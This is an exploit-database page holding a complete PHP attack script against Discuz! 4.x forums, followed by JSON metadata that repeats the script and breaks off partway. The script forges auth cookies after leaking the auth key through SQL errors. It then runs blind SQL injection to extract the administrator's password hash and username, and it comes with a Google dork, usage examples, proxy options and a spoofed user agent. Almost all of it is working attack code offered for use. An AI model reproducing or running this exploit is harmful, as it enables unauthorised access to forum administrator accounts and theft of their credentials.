Search...

Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit

2006-11-28T00:00:00

ID 1337DAY-ID-1216
Type zdt
Reporter rgod
Modified 2006-11-28T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit
================================================================



&lt;?php
print_r('
---------------------------------------------------------------------------
Discuz! 4.x SQL injection / admin credentials disclosure exploit
dork: "powered by discuz!
---------------------------------------------------------------------------
');
if ($argc&lt;3) {
    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to discuz
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /discuz/ -P1.1.1.1:80
php '.$argv[0].' localhost /discuz/ -p81
---------------------------------------------------------------------------
');
    die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i&lt;=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) &lt;= 32 ) | (ord($string[$i]) &gt; 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i&lt;$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]&lt;&gt;'/') or ($path[strlen($path)-1]&lt;&gt;'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "please wait...\n";

//from global.func.php
function authcode($string, $operation, $key = '') {
	$key = $key ? $key : $GLOBALS['discuz_auth_key'];
	$coded = '';
	$keylength = 32;
	$string = $operation == 'DECODE' ? base64_decode($string) : $string;
   	for($i = 0; $i &lt; strlen($string); $i += 32) {
		$coded .= substr($string, $i, 32) ^ $key;
	}
	$coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;
	return $coded;
}

//stolen from install.php
function random($length) {
	$hash = '';
	$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
	$max = strlen($chars) - 1;
	mt_srand((double)microtime() * 1000000);
	for($i = 0; $i &lt; $length; $i++) {
		$hash .= $chars[mt_rand(0, $max)];
	}
	return $hash;
}

$agent="Googlebot/2.1";
//see sql errors... you need auth key,
//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)
$tt="";for ($i=0; $i&lt;=255; $i++){$tt.=chr($i);}
while (1)
{
    $discuz_auth_key=random(32);
    $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
    $packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
    $packet.="User-Agent: $agent\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n";
    $packet.="Accept: text/plain\r\n";
    $packet.="Connection: Close\r\n\r\n";
    $packet.=$data;
    sendpacketii($packet);
    $html=html_entity_decode($html);
    $html=str_replace("&lt;br /&gt;","",$html);
    $t=explode("AND m.password='",$html);
    $t2=explode("' ",$t[1]);
    $pwd_f=$t2[0];
    $t=explode("AND m.secques='",$html);
    $t2=explode("'\n",$t[1]);
    $secques_f=$t2[0];
    $t=explode("AND m.uid='",$html);
    $t2=explode("'\x0d",$t[1]);
    $uid_f=$t2[0];
    $my_string=$pwd_f."\t".$secques_f."\t".$uid_f;
    if ((strlen($my_string)==270) and (!eregi("=",$my_string))){
        break;
    }
}
$temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE");
//calculating key...
$key="";
for ($j=0; $j&lt;32;  $j++){
    for ($i=0; $i&lt;255; $i++){
        $aa="";
        if ($j&lt;&gt;0){
            for ($k=1; $k&lt;=$j; $k++){
                $aa.="a";
            }
        }
        $GLOBALS['discuz_auth_key']=$aa.chr($i);
        $t = authcode($temp,"DECODE");
        if ($t[$j]==$my_string[$j]){
            $key.=chr($i);
        }
   }
}

//echo "AUTH KEY -&gt;".$key."\r\n";
$GLOBALS['discuz_auth_key']=$key;

echo "pwd hash (md5) -&gt; ";
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
    for ($i=0; $i&lt;=255; $i++)
    {
        if (in_array($i,$chars))
        {
            //you can use every char because of base64_decode()...so this bypass magic quotes...
            //and some help by extract() to overwrite vars
            $sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
            $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
            $packet.="User-Agent: $agent\r\n";
            $packet.="CLIENT-IP: 1.2.3.4\r\n";
            $packet.="Host: ".$host."\r\n";
            $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
            $packet.="Accept: text/plain\r\n";
            $packet.="Connection: Close\r\n\r\n";
            $packet.=$data;
            sendpacketii($packet);
            if (eregi("action=groupexpiry",$html)){
                $password.=chr($i);echo chr($i);sleep(1);break;
            }
        }
        if ($i==255) {
            die("\nExploit failed...");
        }
    }
$j++;
}

echo "\nadmin user     -&gt; ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
    for ($i=0; $i&lt;=255; $i++)
    {
        $sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
        $packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
        $packet.="User-Agent: $agent\r\n";
        $packet.="CLIENT-IP: 1.2.3.4\r\n";
        $packet.="Host: ".$host."\r\n";
        $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
        $packet.="Accept: text/plain\r\n";
        $packet.="Connection: Close\r\n\r\n";
        $packet.=$data;
        sendpacketii($packet);
        if (eregi("action=groupexpiry",$html)){
            $admin.=chr($i);echo chr($i);sleep(1);break;
        }
        if ($i==255) {die("\nExploit failed...");}
   }
$j++;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

if (is_hash($password)) {
   echo "exploit succeeded...";
}
else {
   echo "exploit failed...";
}
?&gt;



#  0day.today [2018-01-01]  #

JSON Vulners Source

Initial Source

{"published": "2006-11-28T00:00:00", "id": "1337DAY-ID-1216", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:16:28", "bulletin": {"published": "2006-11-28T00:00:00", "id": "1337DAY-ID-1216", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 3.6, "modified": "2016-04-20T01:16:28"}}, "hash": "007017278c2b534ec4c794ec0aeb5fe551dfa32e520093e46eed5f3bbae99386", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:16:28", "edition": 1, "title": "Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit", "href": "http://0day.today/exploit/description/1216", "modified": "2006-11-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 10, "cvelist": [], "sourceHref": "http://0day.today/exploit/1216", "references": [], "reporter": "rgod", "sourceData": "================================================================\r\nDiscuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit\r\n================================================================\r\n\r\n\r\n\r\n<?php\r\nprint_r('\r\n---------------------------------------------------------------------------\r\nDiscuz! 4.x SQL injection / admin credentials disclosure exploit\r\ndork: \"powered by discuz!\r\n---------------------------------------------------------------------------\r\n');\r\nif ($argc<3) {\r\n print_r('\r\n---------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path OPTIONS\r\nhost: target server (ip/hostname)\r\npath: path to discuz\r\nOptions:\r\n -p[port]: specify a port other than 80\r\n -P[ip:port]: specify a proxy\r\nExample:\r\nphp '.$argv[0].' localhost /discuz/ -P1.1.1.1:80\r\nphp '.$argv[0].' localhost /discuz/ -p81\r\n---------------------------------------------------------------------------\r\n');\r\n die;\r\n}\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\n\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$port=80;\r\n$proxy=\"\";\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\necho \"please wait...\\n\";\r\n\r\n//from global.func.php\r\nfunction authcode($string, $operation, $key = '') {\r\n\t$key = $key ? $key : $GLOBALS['discuz_auth_key'];\r\n\t$coded = '';\r\n\t$keylength = 32;\r\n\t$string = $operation == 'DECODE' ? base64_decode($string) : $string;\r\n \tfor($i = 0; $i < strlen($string); $i += 32) {\r\n\t\t$coded .= substr($string, $i, 32) ^ $key;\r\n\t}\r\n\t$coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;\r\n\treturn $coded;\r\n}\r\n\r\n//stolen from install.php\r\nfunction random($length) {\r\n\t$hash = '';\r\n\t$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';\r\n\t$max = strlen($chars) - 1;\r\n\tmt_srand((double)microtime() * 1000000);\r\n\tfor($i = 0; $i < $length; $i++) {\r\n\t\t$hash .= $chars[mt_rand(0, $max)];\r\n\t}\r\n\treturn $hash;\r\n}\r\n\r\n$agent=\"Googlebot/2.1\";\r\n//see sql errors... you need auth key,\r\n//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)\r\n$tt=\"\";for ($i=0; $i<=255; $i++){$tt.=chr($i);}\r\nwhile (1)\r\n{\r\n $discuz_auth_key=random(32);\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin HTTP/1.0\\r\\n\";\r\n $packet.=\"CLIENT-IP: 999.999.999.999\\r\\n\";//spoof\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$tt,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n $html=html_entity_decode($html);\r\n $html=str_replace(\"<br />\",\"\",$html);\r\n $t=explode(\"AND m.password='\",$html);\r\n $t2=explode(\"' \",$t[1]);\r\n $pwd_f=$t2[0];\r\n $t=explode(\"AND m.secques='\",$html);\r\n $t2=explode(\"'\\n\",$t[1]);\r\n $secques_f=$t2[0];\r\n $t=explode(\"AND m.uid='\",$html);\r\n $t2=explode(\"'\\x0d\",$t[1]);\r\n $uid_f=$t2[0];\r\n $my_string=$pwd_f.\"\\t\".$secques_f.\"\\t\".$uid_f;\r\n if ((strlen($my_string)==270) and (!eregi(\"=\",$my_string))){\r\n break;\r\n }\r\n}\r\n$temp = authcode(\"suntzu\\tsuntzu\\t\".$tt,\"ENCODE\");\r\n//calculating key...\r\n$key=\"\";\r\nfor ($j=0; $j<32; $j++){\r\n for ($i=0; $i<255; $i++){\r\n $aa=\"\";\r\n if ($j<>0){\r\n for ($k=1; $k<=$j; $k++){\r\n $aa.=\"a\";\r\n }\r\n }\r\n $GLOBALS['discuz_auth_key']=$aa.chr($i);\r\n $t = authcode($temp,\"DECODE\");\r\n if ($t[$j]==$my_string[$j]){\r\n $key.=chr($i);\r\n }\r\n }\r\n}\r\n\r\n//echo \"AUTH KEY ->\".$key.\"\\r\\n\";\r\n$GLOBALS['discuz_auth_key']=$key;\r\n\r\necho \"pwd hash (md5) -> \";\r\n$chars[0]=0;//null\r\n$chars=array_merge($chars,range(48,57)); //numbers\r\n$chars=array_merge($chars,range(97,102));//a-f letters\r\n$j=1;$password=\"\";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\n for ($i=0; $i<=255; $i++)\r\n {\r\n if (in_array($i,$chars))\r\n {\r\n //you can use every char because of base64_decode()...so this bypass magic quotes...\r\n //and some help by extract() to overwrite vars\r\n $sql=\"999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=\".$i.\"),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*\";\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin& HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"CLIENT-IP: 1.2.3.4\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$sql,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n if (eregi(\"action=groupexpiry\",$html)){\r\n $password.=chr($i);echo chr($i);sleep(1);break;\r\n }\r\n }\r\n if ($i==255) {\r\n die(\"\\nExploit failed...\");\r\n }\r\n }\r\n$j++;\r\n}\r\n\r\necho \"\\nadmin user -> \";\r\n$j=1;$admin=\"\";\r\nwhile (!strstr($admin,chr(0)))\r\n{\r\n for ($i=0; $i<=255; $i++)\r\n {\r\n $sql=\"999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=\".$i.\"),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*\";\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin& HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"CLIENT-IP: 1.2.3.4\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$sql,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n if (eregi(\"action=groupexpiry\",$html)){\r\n $admin.=chr($i);echo chr($i);sleep(1);break;\r\n }\r\n if ($i==255) {die(\"\\nExploit failed...\");}\r\n }\r\n$j++;\r\n}\r\n\r\nfunction is_hash($hash)\r\n{\r\n if (ereg(\"^[a-f0-9]{32}\",trim($hash))) {return true;}\r\n else {return false;}\r\n}\r\n\r\nif (is_hash($password)) {\r\n echo \"exploit succeeded...\";\r\n}\r\nelse {\r\n echo \"exploit failed...\";\r\n}\r\n?>\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "75b2b48779bc28cd5ace195aa1786129", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "f8a5af6562ec96af31072835bfdf4363", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "75f28477e434a7e3158f885e06336932", "key": "sourceData"}, {"hash": "e5a443e07a4c25f9a6bfc5a8adbe9ead", "key": "sourceHref"}, {"hash": "980ee7dc8600290f4d13f1f46c609aca", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "08eb875e8048d9a2c73c56168a8b2d03", "key": "modified"}, {"hash": "08eb875e8048d9a2c73c56168a8b2d03", "key": "published"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "556dc2c3b52e5965b7defd9d0e913029eb630dcc644f2cb6792f58bd386c3592", "enchantments": {"vulnersScore": 5.0}, "type": "zdt", "lastseen": "2018-01-01T05:15:01", "edition": 2, "title": "Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit", "href": "https://0day.today/exploit/description/1216", "modified": "2006-11-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 11, "cvelist": [], "sourceHref": "https://0day.today/exploit/1216", "references": [], "reporter": "rgod", "sourceData": "================================================================\r\nDiscuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit\r\n================================================================\r\n\r\n\r\n\r\n<?php\r\nprint_r('\r\n---------------------------------------------------------------------------\r\nDiscuz! 4.x SQL injection / admin credentials disclosure exploit\r\ndork: \"powered by discuz!\r\n---------------------------------------------------------------------------\r\n');\r\nif ($argc<3) {\r\n print_r('\r\n---------------------------------------------------------------------------\r\nUsage: php '.$argv[0].' host path OPTIONS\r\nhost: target server (ip/hostname)\r\npath: path to discuz\r\nOptions:\r\n -p[port]: specify a port other than 80\r\n -P[ip:port]: specify a proxy\r\nExample:\r\nphp '.$argv[0].' localhost /discuz/ -P1.1.1.1:80\r\nphp '.$argv[0].' localhost /discuz/ -p81\r\n---------------------------------------------------------------------------\r\n');\r\n die;\r\n}\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\",5);\r\n\r\nfunction quick_dump($string)\r\n{\r\n $result='';$exa='';$cont=0;\r\n for ($i=0; $i<=strlen($string)-1; $i++)\r\n {\r\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\r\n {$result.=\" .\";}\r\n else\r\n {$result.=\" \".$string[$i];}\r\n if (strlen(dechex(ord($string[$i])))==2)\r\n {$exa.=\" \".dechex(ord($string[$i]));}\r\n else\r\n {$exa.=\" 0\".dechex(ord($string[$i]));}\r\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\r\n }\r\n return $exa.\"\\r\\n\".$result;\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\n\r\nfunction sendpacketii($packet)\r\n{\r\n global $proxy, $host, $port, $html, $proxy_regex;\r\n if ($proxy=='') {\r\n $ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) {\r\n echo 'No response from '.$host.':'.$port; die;\r\n }\r\n }\r\n else {\r\n\t$c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {\r\n echo 'Not a valid proxy...';die;\r\n }\r\n $parts=explode(':',$proxy);\r\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\r\n $ock=fsockopen($parts[0],$parts[1]);\r\n if (!$ock) {\r\n echo 'No response from proxy...';die;\r\n\t}\r\n }\r\n fputs($ock,$packet);\r\n if ($proxy=='') {\r\n $html='';\r\n while (!feof($ock)) {\r\n $html.=fgets($ock);\r\n }\r\n }\r\n else {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\n fclose($ock);\r\n}\r\n\r\n$host=$argv[1];\r\n$path=$argv[2];\r\n$port=80;\r\n$proxy=\"\";\r\nfor ($i=3; $i<$argc; $i++){\r\n$temp=$argv[$i][0].$argv[$i][1];\r\nif ($temp==\"-p\")\r\n{\r\n $port=str_replace(\"-p\",\"\",$argv[$i]);\r\n}\r\nif ($temp==\"-P\")\r\n{\r\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\r\n}\r\n}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n\r\necho \"please wait...\\n\";\r\n\r\n//from global.func.php\r\nfunction authcode($string, $operation, $key = '') {\r\n\t$key = $key ? $key : $GLOBALS['discuz_auth_key'];\r\n\t$coded = '';\r\n\t$keylength = 32;\r\n\t$string = $operation == 'DECODE' ? base64_decode($string) : $string;\r\n \tfor($i = 0; $i < strlen($string); $i += 32) {\r\n\t\t$coded .= substr($string, $i, 32) ^ $key;\r\n\t}\r\n\t$coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;\r\n\treturn $coded;\r\n}\r\n\r\n//stolen from install.php\r\nfunction random($length) {\r\n\t$hash = '';\r\n\t$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';\r\n\t$max = strlen($chars) - 1;\r\n\tmt_srand((double)microtime() * 1000000);\r\n\tfor($i = 0; $i < $length; $i++) {\r\n\t\t$hash .= $chars[mt_rand(0, $max)];\r\n\t}\r\n\treturn $hash;\r\n}\r\n\r\n$agent=\"Googlebot/2.1\";\r\n//see sql errors... you need auth key,\r\n//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)\r\n$tt=\"\";for ($i=0; $i<=255; $i++){$tt.=chr($i);}\r\nwhile (1)\r\n{\r\n $discuz_auth_key=random(32);\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin HTTP/1.0\\r\\n\";\r\n $packet.=\"CLIENT-IP: 999.999.999.999\\r\\n\";//spoof\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$tt,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n $html=html_entity_decode($html);\r\n $html=str_replace(\"<br />\",\"\",$html);\r\n $t=explode(\"AND m.password='\",$html);\r\n $t2=explode(\"' \",$t[1]);\r\n $pwd_f=$t2[0];\r\n $t=explode(\"AND m.secques='\",$html);\r\n $t2=explode(\"'\\n\",$t[1]);\r\n $secques_f=$t2[0];\r\n $t=explode(\"AND m.uid='\",$html);\r\n $t2=explode(\"'\\x0d\",$t[1]);\r\n $uid_f=$t2[0];\r\n $my_string=$pwd_f.\"\\t\".$secques_f.\"\\t\".$uid_f;\r\n if ((strlen($my_string)==270) and (!eregi(\"=\",$my_string))){\r\n break;\r\n }\r\n}\r\n$temp = authcode(\"suntzu\\tsuntzu\\t\".$tt,\"ENCODE\");\r\n//calculating key...\r\n$key=\"\";\r\nfor ($j=0; $j<32; $j++){\r\n for ($i=0; $i<255; $i++){\r\n $aa=\"\";\r\n if ($j<>0){\r\n for ($k=1; $k<=$j; $k++){\r\n $aa.=\"a\";\r\n }\r\n }\r\n $GLOBALS['discuz_auth_key']=$aa.chr($i);\r\n $t = authcode($temp,\"DECODE\");\r\n if ($t[$j]==$my_string[$j]){\r\n $key.=chr($i);\r\n }\r\n }\r\n}\r\n\r\n//echo \"AUTH KEY ->\".$key.\"\\r\\n\";\r\n$GLOBALS['discuz_auth_key']=$key;\r\n\r\necho \"pwd hash (md5) -> \";\r\n$chars[0]=0;//null\r\n$chars=array_merge($chars,range(48,57)); //numbers\r\n$chars=array_merge($chars,range(97,102));//a-f letters\r\n$j=1;$password=\"\";\r\nwhile (!strstr($password,chr(0)))\r\n{\r\n for ($i=0; $i<=255; $i++)\r\n {\r\n if (in_array($i,$chars))\r\n {\r\n //you can use every char because of base64_decode()...so this bypass magic quotes...\r\n //and some help by extract() to overwrite vars\r\n $sql=\"999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=\".$i.\"),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*\";\r\n $packet =\"GET \".$p.\"admincp.php?action=recyclebin& HTTP/1.0\\r\\n\";\r\n $packet.=\"User-Agent: $agent\\r\\n\";\r\n $packet.=\"CLIENT-IP: 1.2.3.4\\r\\n\";\r\n $packet.=\"Host: \".$host.\"\\r\\n\";\r\n $packet.=\"Cookie: adminid=1; cdb_sid=1; cdb_auth=\".authcode(\"suntzu\\tsuntzu\\t\".$sql,\"ENCODE\").\";\\r\\n\";\r\n $packet.=\"Accept: text/plain\\r\\n\";\r\n $packet.=\"Connection: Close\\r\\n\\r\\n\";\r\n $packet.=$data;\r\n sendpacketii($packet);\r\n if (eregi(\"action=groupexpiry\",$html)){\r\n $password.=chr($i);echo chr($i);sleep(1);break;\r\n }\r\n }\r\n if ($i==255) {\r\n die(\"\\nExploit failed...\");\r\n }\r\n }\r\n$j++;\r\n}\r\n\r\necho \"\\nadmin user -> 